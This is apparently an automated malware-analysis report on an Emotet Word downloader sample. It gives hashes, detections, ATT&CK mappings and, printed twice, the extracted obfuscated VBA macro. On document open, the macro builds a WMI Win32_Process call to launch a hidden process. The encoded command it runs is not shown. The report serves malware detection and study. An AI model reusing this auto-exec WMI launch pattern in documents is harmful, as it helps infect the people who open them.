Emotet Office (OLE) malware analysis — malicious · 67f27ff168d34fea

MALICIOUS

Office (OLE)

126.9 KB Created: 2019-05-24 13:58:00 Authoring application: Microsoft Office Word First seen: 2020-05-25

MD5: 9a52b337ec45bdbff8f31ca82e29c5ae SHA-1: c67a5af9460939c0b3fd04560b90fcaaa57b4b43 SHA-256: 67f27ff168d34fea798552774ec1859f7ced8ccc9382fe2becd8f806403ee4be

222 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-10001946-0', indicating a downloader functionality. High-severity heuristics confirm the presence of VBA macros, specifically an AutoOpen macro that utilizes CreateObject, a common technique for executing malicious code. The VBA script, though truncated, shows obfuscated string concatenation and calls to functions that likely facilitate payload execution, consistent with Emotet's behavior.

Heuristics 7

ClamAV: Doc.Downloader.Emotet-10001946-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-10001946-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3463 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	3463 bytes
SHA-256: `931b88e4095e4c9a1a2cecce001582f617a2014564b88fbe0a77f5041df59245`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Control = "hS8TzOS, 0, 0, MSForms, ComboBox" Attribute VB_Control = "w8fYSj1, 1, 1, MSForms, ComboBox" Attribute VB_Control = "qzKwvQ, 2, 2, MSForms, ComboBox" Sub _ autoopen( _ ) Debug.Print "JDvJ9I" + "hOsMstw" + "sjLhB6b" Debug.Print ("bMsXK6T" + "qZjTcq8") Debug.Print "zFwjaUd" + ("afKIU4Tl" + "OEz4mD8L") Debug.Print "CjlDibL" YTz1qD_h Debug.Print "hH1rXCN" + "OaqUbZJ" + "LCN8pHav" Debug.Print ("kr_7M_R" + "QMN5V0") Debug.Print "pCq11ls" + ("IsctQm" + "N4RfdVJ") Debug.Print "qpAJ40ur" End Sub Attribute VB_Name = "qzrtzU" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "jvE00Y" Attribute VB_Name = "V0MsFAOi" Attribute VB_Name = "MOaQkfOi" Attribute VB_Name = "tirknk" Attribute VB_Name = "hzqJbj" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "kE_2LD1z" Function YTz1qD_h() ajjavER = ThisDocument.w8fYSj1 + ThisDocument.qzKwvQ + ThisDocument.hS8TzOS Debug.Print "ZjcTjaw" + "KHbiwv" + "pcKnufH" Debug.Print ("bYHtiV" + "wiqTnG") Debug.Print "hMmRL3" + ("WEBBAvB" + "a4aTUp") Debug.Print "XwMGEKWG" Xdt4i9 = "mts" + ":Win32_Proces" Debug.Print "FlWf8jo" + "czj7bA_" + "SYhUiu" Debug.Print ("tic158K" + "fSDEnwP") Debug.Print "sP9lHd" + ("VRwzHm_" + "FTtp3VB3") Debug.Print "KOukRfc4" lTEFp7U("win" + "mg" + Xdt4i9 + "s") _ .Create# ajjavER, V_aah5, FS2_zkNf, ZqDk7s7H Debug.Print "HpbBozuD" + "rK5j1Wc2" + "ECdRVj" Debug.Print ("qDR3uk" + "wh64fK") Debug.Print "SamRI0Iq" + ("mGMKqFw" + "cm9aUm") Debug.Print "v8Gk6ci" End Function Attribute VB_Name = "o816l1N1" Function FS2_zkNf() Xdt4i9 = "mts" + ":Win32_Proces" Debug.Print "ZGrIHh" + "Nwz592K" + "K1Omuzc2" Debug.Print ("zJO8di" + "zb3ncA") Debug.Print "I4Occj" + ("DL_tvROR" + "XNB1UWt") Debug.Print "JEjYN3" Set FS2_zkNf = lTEFp7U("win" + "mg" + Xdt4i9 + "sStartup") Debug.Print "sI3VWd" + "HCh75Ni" + "SjFjjvE" Debug.Print ("WHfDRp4z" + "Wbmj_iEf") Debug.Print "rJGHz_i" + ("OXz7lCp" + "n4DHQp") Debug.Print "m8F9fP" With FS2_zkNf Debug.Print "BjCond5" + "WXzrlIQ" + "lTTNOjH1" Debug.Print ("jItaWE" + "WENjrv") Debug.Print "SoD0YP" + ("aFP1Shjw" + "nVs9am2") Debug.Print "pdNmjiIJ" . _ ShowWindow = sY9C6Q + A5iZJC_U + LbIjZWN + kRKXCBQ + TpCJw7z Debug.Print "zavqLU" + "AYMqwj" + "iY4_ka4" Debug.Print ("iwOK48r0" + "CWfCkMza") Debug.Print "Bj74RLB" + ("lhhC0ljr" + "Wfr3wd") Debug.Print "SSzzAo" End With Debug.Print "j9vsP_Z" + "jZM7TKi4" + "w9nbUWu7" Debug.Print ("qD40ECYd" + "P0awVa") Debug.Print "wGnzjP" + ("CjaWfEz" + "cjN2RzAL") Debug.Print "zizF64u" End Function Attribute VB_Name = "Afojm0" Function lTEFp7U(QqR2L9lf) Set lTEFp7U = CVar(CreateObject(QqR2L9lf)) End Function

SHA-256: 931b88e4095e4c9a1a2cecce001582f617a2014564b88fbe0a77f5041df59245

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "hS8TzOS, 0, 0, MSForms, ComboBox"
Attribute VB_Control = "w8fYSj1, 1, 1, MSForms, ComboBox"
Attribute VB_Control = "qzKwvQ, 2, 2, MSForms, ComboBox"
Sub _
autoopen( _
)
   Debug.Print "JDvJ9I" + "hOsMstw" + "sjLhB6b"
Debug.Print ("bMsXK6T" + "qZjTcq8")
Debug.Print "zFwjaUd" + ("afKIU4Tl" + "OEz4mD8L")
Debug.Print "CjlDibL"
YTz1qD_h
   Debug.Print "hH1rXCN" + "OaqUbZJ" + "LCN8pHav"
Debug.Print ("kr_7M_R" + "QMN5V0")
Debug.Print "pCq11ls" + ("IsctQm" + "N4RfdVJ")
Debug.Print "qpAJ40ur"
End Sub


Attribute VB_Name = "qzrtzU"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "jvE00Y"

Attribute VB_Name = "V0MsFAOi"

Attribute VB_Name = "MOaQkfOi"

Attribute VB_Name = "tirknk"

Attribute VB_Name = "hzqJbj"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "kE_2LD1z"
Function YTz1qD_h()
ajjavER = ThisDocument.w8fYSj1 + ThisDocument.qzKwvQ + ThisDocument.hS8TzOS
   Debug.Print "ZjcTjaw" + "KHbiwv" + "pcKnufH"
Debug.Print ("bYHtiV" + "wiqTnG")
Debug.Print "hMmRL3" + ("WEBBAvB" + "a4aTUp")
Debug.Print "XwMGEKWG"
Xdt4i9 = "mts" + ":Win32_Proces"
   Debug.Print "FlWf8jo" + "czj7bA_" + "SYhUiu"
Debug.Print ("tic158K" + "fSDEnwP")
Debug.Print "sP9lHd" + ("VRwzHm_" + "FTtp3VB3")
Debug.Print "KOukRfc4"
lTEFp7U("win" + "mg" + Xdt4i9 + "s") _
.Create# ajjavER, V_aah5, FS2_zkNf, ZqDk7s7H
   Debug.Print "HpbBozuD" + "rK5j1Wc2" + "ECdRVj"
Debug.Print ("qDR3uk" + "wh64fK")
Debug.Print "SamRI0Iq" + ("mGMKqFw" + "cm9aUm")
Debug.Print "v8Gk6ci"
End Function


Attribute VB_Name = "o816l1N1"
Function FS2_zkNf()
Xdt4i9 = "mts" + ":Win32_Proces"
   Debug.Print "ZGrIHh" + "Nwz592K" + "K1Omuzc2"
Debug.Print ("zJO8di" + "zb3ncA")
Debug.Print "I4Occj" + ("DL_tvROR" + "XNB1UWt")
Debug.Print "JEjYN3"
Set FS2_zkNf = lTEFp7U("win" + "mg" + Xdt4i9 + "sStartup")
   Debug.Print "sI3VWd" + "HCh75Ni" + "SjFjjvE"
Debug.Print ("WHfDRp4z" + "Wbmj_iEf")
Debug.Print "rJGHz_i" + ("OXz7lCp" + "n4DHQp")
Debug.Print "m8F9fP"
With FS2_zkNf
   Debug.Print "BjCond5" + "WXzrlIQ" + "lTTNOjH1"
Debug.Print ("jItaWE" + "WENjrv")
Debug.Print "SoD0YP" + ("aFP1Shjw" + "nVs9am2")
Debug.Print "pdNmjiIJ"
. _
ShowWindow = sY9C6Q + A5iZJC_U + LbIjZWN + kRKXCBQ + TpCJw7z
   Debug.Print "zavqLU" + "AYMqwj" + "iY4_ka4"
Debug.Print ("iwOK48r0" + "CWfCkMza")
Debug.Print "Bj74RLB" + ("lhhC0ljr" + "Wfr3wd")
Debug.Print "SSzzAo"
End With
   Debug.Print "j9vsP_Z" + "jZM7TKi4" + "w9nbUWu7"
Debug.Print ("qD40ECYd" + "P0awVa")
Debug.Print "wGnzjP" + ("CjaWfEz" + "cjN2RzAL")
Debug.Print "zizF64u"
End Function


Attribute VB_Name = "Afojm0"
Function lTEFp7U(QqR2L9lf)
Set lTEFp7U = CVar(CreateObject(QqR2L9lf))
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.